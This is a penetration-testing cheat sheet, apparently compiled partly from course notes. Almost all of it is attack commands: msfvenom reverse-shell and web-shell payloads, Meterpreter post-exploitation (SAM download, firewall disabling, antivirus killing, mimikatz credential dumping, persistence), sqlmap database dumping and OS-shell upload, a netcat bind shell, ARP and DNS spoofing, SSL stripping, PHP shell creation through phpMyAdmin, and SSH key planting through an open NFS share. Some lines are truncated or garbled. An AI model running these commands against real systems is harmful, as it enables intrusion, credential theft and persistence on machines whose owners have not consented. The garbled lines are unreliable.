Metasploit Cheat Sheet

List payloads

msfvenom -l

I. Binaries


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf


msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe


msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

II. Web Payloads


msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp


msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp


msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

III. Scripting Payloads


msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw >


msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw >


msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw >

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

IV. Shellcode

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive 

your incoming shells. Handlers should be in the following format.

VI. Handlers

use exploit/multi/handler
set ExitOnSession false
exploit -j -z

Meterpreter Useful Commands:

upload file c:\\windows

upload file c:\\windows

download c:\\windows\\repair\\sam /tmp

execute -f c:\\windows\temp\exploit.exe

execute -f cmd -c





portfwd add –l 3389 –p 3389 –r target

portfwd delete –l 3389 –p 3389 –r target

portfwd delete –l 3389 –p 3389 –r target

Additional useful commands are as follows:

  • msfconsole – r unicorn.rb

  • meterpreter shell

  • getsid

  • getuid

  • migrate

  • getsystem

  • run killav

  • run checkvm

  • exploit Windows7 Service Pack 1 msp

  • use incognito

  • run countermeasure

  • run countermeasure –d –k

  • shell

    • netsh firewall set opmode disable //disable firewall

  • run vnc

  • load mimikatz

  • ls

  • upload /home/user/mimikatz.exe C:\\

  • timestop mimikatz.exe -f "C:\\Windows\System32\\cmd.exe"

  • shell

    • mimikatz.exe

    • privilege::debug

    • inject::process lsass.exe sekurlsa.dll

    • getLogonPasswords

    • sekurlsa::logonPasswords full

  • run persistence -A -L C:\\ -X -i 10 -p 443 -r

  • attrib +h c:\autoexec.bat //make it hidden

  • Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)

Burp Suite and sqlmap

1. Burpsuite -> Intruder

2. sqlmap
python -u “”

# Discover databases
python -u “” –dbs

# Find tables in a particular database
python -u “” –tables -D database_name

# Get columns of the table
python -u “” –columns -D database_name -T users

# Get data from the columns
python -u “” –dump -D database_name -T users

# Upload os-shell
python -u “” –os-shell

# Upload a PHP shell
-> b374kshell.php

Netcat Shell and Persistence

# Notes on Cybrary “Advanced Penetration Test”
Opening a command shell listener:root@kali:~# nc -lvp 1234 -e /bin/bash

Transferring files:Redirect output to a file:root@kali:~# nc -lvp 1234 > netcatfile

Send a file from another terminal:root@kali:~# nc 1234 < mydirectory/myfile

Automating Tasks with cron jobsAdd your task to one of the scheduled directories

​*For more flexibility add a line to /etc/crontab

Information Gathering

# Source: Cybrary “Advanced Penetration Test”

*Find as much information as possible about the target.
*What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?

(1) Google Dorks
Database of helpful Google Dorks:
Example: xamppdirpasswd.txt filetype:txt finds xampp passwords

(2) Shodan (Python API)
Search engine that uses banner grabbing

(3) Whois
Domain registration records
root@kali:~# whois

(4) DNS Recon
​root@kali:~# host
root@kali:~# host -t ns
root@kali:~# host -t mx

*DNS Zone Transfer 
root@kali:~# host -t ns
root@kali:~# host -l

DNS Bruteforce
root@kali:~# fierce -dns

​(5) Netcraft​

(6) ​The HarvesterThe Harvester automatically searches for emails etc. online
root@kali:~# theharvester -d -l 500 -b all

(7) Maltego
Graphical information gathering and correlation tool
root@kali:~# maltego

(8) Recon-ng
Reconnaissance framework
recon-ng > use recon/hosts/enum/http/web/xssed [recon-ng][default][xssed] > show options
recon-ng [xssed] > set DOMAIN
recon-ng [xssed] > run

(9) Port Scanning
root@kali:~# nmap -sS -oA synscan
root@kali:~# nmap -sU -oA udpscan

Metasploit Port Scanners​
search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP connect scan)
Use auxiliary modules like exploits (use, set, exploit, etc..)

Vulnerability Identification

Source: Georgia Weidman, “Advanced Penetration Test” Cybrary
Query systems for potential vulnerabilities

(1) Nessus
Vulnerability database + scanner 

(2) Nmap Scripting EngineVulnerability scripts
Listed in /usr/share/nmap/scripts in Kali 

nmap -sC 
nmap –script-help=smb-check-vulns 
nmap –script=nfs-ls 
nmap –script=smb-os-discovery

(3) Metasploit Scanners​auxiliary/scanner/ftp/anonymous 

Web Application Scanning​
(1) Dirbuster
Graphical tool that is used for bruteforcing directories and pages.

(2) NiktoVulnerability database of known website issues
nikto -host

Manual Analysis
*Default passwords – Webdav
*Misconfigured pages – open phpMyAdmin
*Port 3232 on the Windows system – sensitive webserver with directory traversal

Capturing Traffic

Source: Georgia Weidman on “Advanced Penetration Test”

(1) ARP Spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t
arpspoof -i eth0 -t

(2) Domain Name Service (DNS)
DNS Cache Poisoning
*Restart arpspoofing between gateway and target
dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)​
Crypto between browser and webserver
Can’t see credentials in plaintext

SSL Man in the Middle​
SSL Stripping​

iptables -t nat -A PREROUTING -p tcp — destination-port 80 -j REDIRECT –to-port 8080
Spoof the default gateway with Arpspoof
sslstrip -l 8080

Exploitation: Basics

Source: Georgia Weidman on “Advanced Penetration Test”

(1) Webdav Default Credentials
Default -> wampp:xampp

a. cadaver
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit

(2) ​Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT ““”””” into outfile “C:\\xampp\\htdocs\\shell.php”

b. Add a meterpreter PHP file get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

(3) Downloading Sensitive Files
Zervit 0.4 directory traversal
nc 3232 GET /../../../../../boot.ini HTTP/1.1

(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail

(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution

(6) ​Piggybacking on a Compromised Service
VsFTP -> backdoored
Username ending in a 🙂 spawned a backdoor on port 6200

(7) Exploiting Open NFS Shares
NFS on port 2049
showmount –e
mkdir /tmp/r00t/
mount -t nfs –o nolock /tmp/r00t/
cat ~/.ssh/ >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/